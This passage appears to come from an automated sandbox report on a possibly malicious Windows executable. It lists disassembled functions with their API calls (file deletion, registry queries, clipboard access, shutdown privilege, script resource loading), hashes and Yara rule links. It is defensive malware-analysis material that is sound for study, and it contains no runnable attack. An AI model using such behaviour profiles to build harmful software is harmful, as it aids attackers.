                                                                                                                                                                                                                                                                                                                            Function 0024A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0024A0A8
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0024A0E6
                                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0024A100
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0024A118
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A123
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0024A13F
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0024A18F
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00297B94), ref: 0024A1AD
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0024A1B7
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A1C4
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A1D4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 589f07bb7a3d8eaf3112f6c0e92241d177a9d6297226bd2f0da0ea4577edbc57
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b762f143945532d030fe0aa13a9ef3e077927025e26a6c3bf9b8074a3c61b3ff
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 589f07bb7a3d8eaf3112f6c0e92241d177a9d6297226bd2f0da0ea4577edbc57
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E312732A5021E6BDF14AFB4EC4DADE73AC9F09320F004095F91DE3090EBB0DE608A61
                                                                                                                                                                                                                                                                                                                            Function 00244763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00244785
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002447B2
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 002447E2
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00244803
                                                                                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00244813
                                                                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0024489A
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002448A5
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002448B0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e069adacda57099a748bfd4407f912a513870c1c2f46f1067e0e50c9a064f592
                                                                                                                                                                                                                                                                                                                            • Instruction ID: be1ac7e48d2feaaa34240286ffdc2302f4b249a7364c2c04544c00473fcf5594
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e069adacda57099a748bfd4407f912a513870c1c2f46f1067e0e50c9a064f592
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9631C775A1014EABDB219FA0DC49FEF37BCEF89740F1041B6FA09D6160E7B096548B24
                                                                                                                                                                                                                                                                                                                            Function 0024A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0024A203
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0024A25E
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A269
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0024A285
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0024A2D5
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00297B94), ref: 0024A2F3
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0024A2FD
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A30A
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A31A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0023E3B4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8af5b182d5e7d907b2ae3883ea44bdf6fb0111b282bf1a886b4d933d897bbdaf
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 88d97bc2c041dc714b44d54e8916f28b4ea3b3e0f0480d569eaf51c599c516ae
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8af5b182d5e7d907b2ae3883ea44bdf6fb0111b282bf1a886b4d933d897bbdaf
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15311232A5021E6ACF14EFA4EC09ADE77ACAF45324F104191F910A31A0EBB1DEA59A55
                                                                                                                                                                                                                                                                                                                            Function 0025C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0025C10E,?,?), ref: 0025D415
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D451
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4C8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4FE
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025C99E
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0025CA09
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025CA2D
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0025CA8C
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0025CB47
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0025CBB4
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0025CC49
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0025CC9A
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0025CD43
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0025CDE2
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025CDEF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 47802a12095933dbcedd11ffe96e0453f48b98071b5ef79a5697e51112bdb107
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 67c4b117151f4efe481556c47fce10fdf3a67283b703c39018a5df453996db73
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47802a12095933dbcedd11ffe96e0453f48b98071b5ef79a5697e51112bdb107
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA023B71614301AFC714DF28C895E2ABBF5EF49314F1884ADE84ACB2A2DB31ED56CB51
                                                                                                                                                                                                                                                                                                                            Function 0023D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001D55D1,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 001D5871
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023EAB0: GetFileAttributesW.KERNEL32(?,0023D840), ref: 0023EAB1
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0023D9CD
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0023DA88
                                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0023DA9B
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0023DAB8
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0023DAE2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0023DAC7,?,?), ref: 0023DB5D
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0023DAFE
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0023DB0F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f32052f8e1ed6bb8eb1e3e7cdf393065d78a07a6924edb2e3ec6cb5b6065715d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ef1f5e85e747a75312ffeb23f0f86f2439edb190b441b5846a33982feff026f5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f32052f8e1ed6bb8eb1e3e7cdf393065d78a07a6924edb2e3ec6cb5b6065715d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27614D7191510DAECF05EFE0EA929EDB7B6AF24304F6440A6E402B7291EB716F19CB50
                                                                                                                                                                                                                                                                                                                            Function 0024F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 792bf47aa24850b35395df1709d51e78753a12925f3bee83d4cc55199816cada
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 200d0447865b6aad00b173e95a426557af4df5cf8e768db1fca5ef1e6cc3e4ee
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 792bf47aa24850b35395df1709d51e78753a12925f3bee83d4cc55199816cada
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED419D31A14602AFD714DF15E98CB16BBE4EF94318F14C4A9E8198F7A2CB75EC42CB90
                                                                                                                                                                                                                                                                                                                            Function 0023F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023205A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00232087
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232010: GetLastError.KERNEL32 ref: 00232097
                                                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0023F249
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 488fdb90e189cb6859726f0151edc30b45b8709817810c60acdc63fcbb26b4d1
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cfa84bce6dde5ad1d00286822be583d5b9ebaaf2b2997e5288a2b113ac69da16
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 488fdb90e189cb6859726f0151edc30b45b8709817810c60acdc63fcbb26b4d1
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D60149FAF30215ABEB5826B8BECAFBF726C9B08344F144431FD03E21D2D5A08C249590
                                                                                                                                                                                                                                                                                                                            Function 001D22AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 001D233E
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 001D2421
                                                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 001D2434
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 929743424-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8ebd69e359856684200f1f16f3d64ff7197752aceafa9b167d7300c7445d6b4e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6ce00ad2d4d98b9622a5ef1660d5df590183448fea37c2024d7c54b856cf9ce9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ebd69e359856684200f1f16f3d64ff7197752aceafa9b167d7300c7445d6b4e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A811AB0124404BEE62DAA3C4C98EBF159EFB7A310B16011BF112D67D5CB798FD29276
                                                                                                                                                                                                                                                                                                                            Function 00243A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002156C2,?,?,00000000,00000000), ref: 00243A1E
                                                                                                                                                                                                                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002156C2,?,?,00000000,00000000), ref: 00243A35
                                                                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,002156C2,?,?,00000000,00000000,?,?,?,?,?,?,001D66CE), ref: 00243A45
                                                                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,002156C2,?,?,00000000,00000000,?,?,?,?,?,?,001D66CE), ref: 00243A56
                                                                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(002156C2,?,?,002156C2,?,?,00000000,00000000,?,?,?,?,?,?,001D66CE,?), ref: 00243A65
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                                            • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c05a77975cfa074e226cc8a9fe6378b8c82541c9f83bda44f566374f3d8c9812
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 78a3c1ac420b2cc2feaf61aa8ad96905ad9931842074696dcb1c961e0404a863
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c05a77975cfa074e226cc8a9fe6378b8c82541c9f83bda44f566374f3d8c9812
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC117C70650715BFE7298F25EC48F277BB9EBC5B40F14826CF402D61A0DBB1D9008660
                                                                                                                                                                                                                                                                                                                            Function 002320AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00231916
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00231922
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00231931
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00231938
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0023194E
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00231C81), ref: 002320FB
